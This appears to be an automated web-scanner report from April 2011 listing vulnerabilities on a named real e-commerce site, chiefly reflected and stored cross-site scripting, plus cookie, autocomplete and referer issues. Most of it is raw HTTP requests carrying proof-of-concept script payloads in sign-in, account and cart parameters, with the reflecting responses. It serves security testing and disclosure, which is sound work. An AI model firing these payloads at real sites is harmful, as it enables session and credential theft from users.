1. Cross-site scripting (stored)
2. Cross-site scripting (reflected)
2.1. http://ecommerce.randomhouse.com/cart.do [from parameter]
2.2. http://ecommerce.randomhouse.com/cart.do [from parameter]
2.3. http://ecommerce.randomhouse.com/cart.do [from parameter]
2.4. http://ecommerce.randomhouse.com/cart.do [from parameter]
2.5. https://ecommerce.randomhouse.com/account.do [from parameter]
2.6. https://ecommerce.randomhouse.com/account.do [from parameter]
2.7. https://ecommerce.randomhouse.com/account.do [from parameter]
2.8. https://ecommerce.randomhouse.com/account.do [from parameter]
2.9. https://ecommerce.randomhouse.com/create-account-submit.do [confirmPassword parameter]
2.10. https://ecommerce.randomhouse.com/create-account-submit.do [email parameter]
2.11. https://ecommerce.randomhouse.com/create-account-submit.do [password parameter]
2.12. https://ecommerce.randomhouse.com/create-account.do [from parameter]
2.13. https://ecommerce.randomhouse.com/create-account.do [from parameter]
2.14. https://ecommerce.randomhouse.com/create-account.do [from parameter]
2.15. https://ecommerce.randomhouse.com/password.do [from parameter]
2.16. https://ecommerce.randomhouse.com/password.do [from parameter]
2.17. https://ecommerce.randomhouse.com/sign-in-submit.do [email parameter]
2.18. https://ecommerce.randomhouse.com/sign-in-submit.do [password parameter]
2.19. https://ecommerce.randomhouse.com/sign-in.do [from parameter]
2.20. https://ecommerce.randomhouse.com/sign-in.do [from parameter]
2.21. https://ecommerce.randomhouse.com/sign-in.do [from parameter]
2.22. https://ecommerce.randomhouse.com/sign-in.do [from parameter]
2.23. https://ecommerce.randomhouse.com/sign-in.do [from parameter]
2.24. https://ecommerce.randomhouse.com/sign-in.do [from parameter]
3. Cookie without HttpOnly flag set
3.1. http://ecommerce.randomhouse.com/cart.do
3.2. https://ecommerce.randomhouse.com/account.do
3.3. https://ecommerce.randomhouse.com/sign-in.do
3.4. http://ecommerce.randomhouse.com/cart.do
4. Password field with autocomplete enabled
4.1. https://ecommerce.randomhouse.com//email-password.do
4.2. https://ecommerce.randomhouse.com/account.do
4.3. https://ecommerce.randomhouse.com/create-account-submit.do
4.4. https://ecommerce.randomhouse.com/create-account.do
4.5. https://ecommerce.randomhouse.com/sign-in-submit.do
4.6. https://ecommerce.randomhouse.com/sign-in.do
5. Cookie scoped to parent domain
6. Cross-domain Referer leakage
6.1. http://ecommerce.randomhouse.com/cart.do
6.2. https://ecommerce.randomhouse.com//create-address.do
6.3. https://ecommerce.randomhouse.com//email-password.do
6.4. https://ecommerce.randomhouse.com//select-address.do
6.5. https://ecommerce.randomhouse.com//view-orders.do
6.6. https://ecommerce.randomhouse.com/account.do
6.7. https://ecommerce.randomhouse.com/create-account.do
6.8. https://ecommerce.randomhouse.com/password.do
6.9. https://ecommerce.randomhouse.com/sign-in.do
7. Cross-domain script include
7.1. http://ecommerce.randomhouse.com/cart.do
7.2. https://ecommerce.randomhouse.com//account.do
7.3. https://ecommerce.randomhouse.com//create-address.do
7.4. https://ecommerce.randomhouse.com//email-password.do
7.5. https://ecommerce.randomhouse.com//select-address.do
7.6. https://ecommerce.randomhouse.com//view-orders.do
7.7. https://ecommerce.randomhouse.com/account.do
7.8. https://ecommerce.randomhouse.com/create-account-submit.do
7.9. https://ecommerce.randomhouse.com/create-account.do
7.10. https://ecommerce.randomhouse.com/password.do
7.11. https://ecommerce.randomhouse.com/sign-in-submit.do
7.12. https://ecommerce.randomhouse.com/sign-in.do
8.1. http://ecommerce.randomhouse.com/store/js/rh/ecom.js
8.2. http://ecommerce.randomhouse.com/store/js/rh/prototype.js
8.3. http://ecommerce.randomhouse.com/store/js/rh/s_code.js
8.4. https://ecommerce.randomhouse.com//store/js/rh/ecom.js
8.5. https://ecommerce.randomhouse.com//store/js/rh/prototype.js
8.6. https://ecommerce.randomhouse.com//store/js/rh/s_code.js
8.7. https://ecommerce.randomhouse.com/store/js/rh/ecom.js
8.8. https://ecommerce.randomhouse.com/store/js/rh/prototype.js
8.9. https://ecommerce.randomhouse.com/store/js/rh/s_code.js
9.1. https://ecommerce.randomhouse.com//account.do
9.2. https://ecommerce.randomhouse.com//create-address.do
9.3. https://ecommerce.randomhouse.com//email-password.do
9.4. https://ecommerce.randomhouse.com//select-address.do
9.5. https://ecommerce.randomhouse.com//view-orders.do
9.6. https://ecommerce.randomhouse.com/account.do
9.7. https://ecommerce.randomhouse.com/address-validator.do
9.8. https://ecommerce.randomhouse.com/create-account-submit.do
9.9. https://ecommerce.randomhouse.com/create-account.do
9.10. https://ecommerce.randomhouse.com/password.do
9.11. https://ecommerce.randomhouse.com/sign-in-submit.do
9.12. https://ecommerce.randomhouse.com/sign-in.do
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //account.do |
POST /create-account-submit.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 Origin: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 Content-Length: 274 shippingAddress ...[SNIP]... |
GET //account.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:50:34 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17132 <!-- account.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... <span class="loggedInText">'@' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=randomhouseb9cd4'%3balert(1)/ Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:26 GMT Server: Apache Set-Cookie: JSESSIONID=273F58D0D Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19596 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( 'randomhouseb9cd4';alert(1)/ if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=randomhouse49283"%3balert(1)/ Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:26 GMT Server: Apache Set-Cookie: JSESSIONID=6766FA4EC Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19589 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... <!-- var s_account="ranhcorporate var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse49283";alert(1)/ //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=randomhouse17962"><script>alert(1)< Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:25 GMT Server: Apache Set-Cookie: JSESSIONID=CF4601245 Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 19701 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... <a class="rollover" href="http://ecommerce ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /cart.do |
GET /cart.do?from=%27%22--%3E Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:48:07 GMT Server: Apache Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT Content-Type: text/html;charset=ISO Content-Length: 20031 <!-- shoppingCart.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... </script>.de38d<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:42 GMT Server: Apache Set-Cookie: JSESSIONID=E1AEBB4B9 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17083 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( 'randomhouse8a18b';alert(1)/ if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:39 GMT Server: Apache Set-Cookie: JSESSIONID=BB1FFAF98 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17203 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <a class="rollover" href="http://ecommerce ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:40 GMT Server: Apache Set-Cookie: JSESSIONID=83BECC0B6 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17083 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhouse584a0";alert(1)/ //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from=74f99'%3balert(1)/ Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:46 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 16995 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( '74f99';alert(1)/ if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account-submit.do |
GET /create-account-submit.do Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 Origin: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:58:29 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20934 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... <input type="password" name="confirmPassword" value="1234rf7ef75"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account-submit.do |
GET /create-account-submit.do Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 Origin: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:52:42 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17138 <!-- account.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... <span class="loggedInText">'@' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account-submit.do |
GET /create-account-submit.do Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 Origin: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:58:19 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20934 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... <input type="password" name="password" value="1234rf7dc3b"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account.do |
GET /create-account.do?from=1c691"><script>alert(1)< Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:48:07 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20322 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... <a class="rollover" href="http://ecommerce ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account.do |
GET /create-account.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:48:29 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20496 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... </script>.86d84<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account.do |
GET /create-account.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:48:11 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20493 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... </script>88201<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /password.do |
GET /password.do?from=2402d"style%3d"x%3aexpr/* Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:27 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 11462 <!-- forgottenPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /password.do |
GET /password.do?from=%00d764b"><script>alert(1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:32 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 11441 <!-- forgottenPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in-submit.do |
GET /sign-in-submit.do?email=2d8a7"><script>alert(1)< Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 Origin: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:40:08 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17136 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <input type="text" name="email" value="2d8a7"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in-submit.do |
GET /sign-in-submit.do?email= Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 Origin: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:41:50 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16987 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <input type="password" name="password" value="4d019"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:07:07 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17075 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhousea8336";alert(1)/ //--> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from=182e6"%3b566f826a9ff HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:02 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 16907 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="182e6";566f826a9ff"; //--> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from=%0010afa"style%3d"x Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:59 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 17147 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <a class="rollover" href="http://ecommerce ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:07:04 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17195 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <a class="rollover" href="http://ecommerce ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from=b6f8e</script>0cfb073a38a HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:44 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 16963 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( 'b6f8e</script>0cfb073a38a' == '') { if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
